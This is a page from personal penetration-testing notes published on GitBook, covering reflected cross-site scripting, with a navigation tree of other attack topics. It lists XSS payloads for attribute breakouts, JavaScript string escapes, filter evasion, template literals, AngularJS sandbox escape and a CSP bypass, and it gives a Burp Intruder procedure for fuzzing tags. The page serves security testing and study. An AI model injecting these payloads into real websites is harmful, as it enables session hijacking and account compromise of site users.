📑
Security Notes
  • Readme
  • Resources
    • Useful sites
    • Metasploit
      • Searchsploit
      • Msfvenom
      • Meterpreter
    • Shells
    • Linux
      • Cron
      • Connection
      • Compilers
    • Windows
      • Kernel exploits table
    • Bruteforce
      • Checklist
      • John the Ripper
      • Hashcat
    • BOF
      • Assembly
    • Gaining access checklist
  • Cloud - AWS
    • Enumeration
    • References
    • Bucket S3
      • Public Bucket
      • AMI Files
      • File upload to RCE
    • EC2
      • cloud-init Exploits
      • SSRF To AWS Role compromise
      • Unencrypted EBS
    • IAM
      • Account Disclosure by resource policy
    • Lambda Function
      • Code Injection
      • Attacking APIs
    • VPC
      • Expose Resources
  • Networking
    • Nmap
      • Scan types
    • TCPDump
    • Port forwarding
    • Ports
      • 21 - FTP
      • 22 - SSH
      • 25 465 587 - SMTP
      • 53 - DNS
      • 110 995 - POP3
      • 111 - NFS
      • 113 - Ident
      • 123 - NTP
      • 135 137 139 - RPC
      • 143 993 - IMAP
      • 161 - SNMP
      • 389 - LDAP
      • 139 445 - SMB
      • 873 - Rsync
      • 6379 - Redis
      • 6667 - IRC
  • Linux PrivEsc
    • Checklist
    • Enumeration
      • Important files
      • Memory Dump
    • Privileges Exploitation
    • Wildcard Exploits
    • Sudo Exploits
    • Docker Container
    • Docker Groups
    • Common Exploits
  • Windows PrivEsc
    • Checklist
    • Enumeration
      • Important Files
    • Antivirus evasion tools
    • Unquoted paths
    • Always install elevated
    • Vulnerable services
    • Client side
    • Exploitable privileges
      • Juicy Potato
    • UAC bypass
    • Common Exploits
  • Active Directory
    • Introduction
    • Checklist
    • Enumeration
    • Enable RDP
    • Kerberos
    • Rubeus
    • Credentials harvesting
      • Domain Controller specific
    • Connection
    • Pass The Hash
    • Kerberoast
    • ASREProast
    • Tickets
  • Web Attacks
    • Checklist
    • Enumeration
      • URL bruteforcing
    • APIs and Fields
    • Authentication
    • Filter Evasion
      • Fuzzying and encoding
    • File Vulnerabilities
      • LFI List
      • PHP shells
    • RCE
    • Code Injection
    • Dependency Injection
    • Joomla
    • Wordpress
    • WebDAV
    • HTTP
    • XSS
      • DOM Based
      • Reflected
      • Filter Evasion
    • SSI
    • SSTI
    • RCE
    • CSRF
    • SQL injection
      • sqlmap
      • PostgreSQL
      • Oracle
      • MSSQL
      • MySQL
      • Login
    • XPath injection
    • XXE
    • CORS
  • MOBILE PENTESTING
    • Static Code Analysis
    • Dynamic Code Analysis
    • Network Traffic Analysis
Powered by GitBook
On this page
  • Context
  • AccessKey Attribute
  • HTML Parameter
  • HTML Tags
  • Javascript Block
  • JS Template Literals
  • AngularJS Sandbox Escape
  1. Web Attacks
  2. XSS

Reflected

PreviousDOM BasedNextFilter Evasion

Last updated 2 years ago

Context

AccessKey Attribute

Set a global accessKey parameter. When the user presses the selected key, a script will be executed. Works only on Chrome

<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)

HTML Parameter

"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">

//in case brackets are escaped, give onfocus event and focus on self
" autofocus onfocus="..." x="
" onmouseover="..." x="

Anchor href parameter poisoning

href="javascript:'...'"

HTML Tags

  1. Find vulnerable field

  2. Send request to Burp Intruder as following <§[payload]§> to find unfiltered tags

  3. Set the payload to a list of tags (see ) and start the attack

  4. After finding an unfiltered tag set the payload to <[tag]+§[payload]§="alert()">

  5. Set the payload to a list of events (see ) and start the attack

  6. After finding a suitable event the basic payload will be<[tag]+[event]="[js]">

Deliver through IFrame

<iframe src="<url>" onload="...">

Deliver with custom tag with autofocus

<script>
location = "<url>/?search=<xss id='x' onfocus='...' tabindex=1>#x";
</script>

Javascript Block

Escape from string such as var x = 'input'

</script><script>...</script>

Escape from strings with angled brackets encoded

'-<payload>-'
';<payload>//

Evade filters

\';<...>//                    //double quote filter
onerror=<func>;throw <arg>    //assign to error event.
&apos;-<...>-&apos;           //HTML escaped quotes

JS Template Literals

JS template strings are declared between backticks and use ${...} notation to evaluate code and inject the result in the string.

`Welcome, ${user.displayName}.`;

To execute code simply inject ${<...>} in the string

AngularJS Sandbox Escape

Sandbox escape by owerwriting the charAt method to join characters instead of evaluoating them one at a time

toString().constructor.prototype.charAt%3d[].join;

Code execution payloads

$eval('x=<...>')
[1]|orderBy:toString().constructor.fromCharCode(120 61 <charcode payload>)=1  //120 61 is for 'x='

Content Security Policy Bypass

<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],<...>)'">
here
here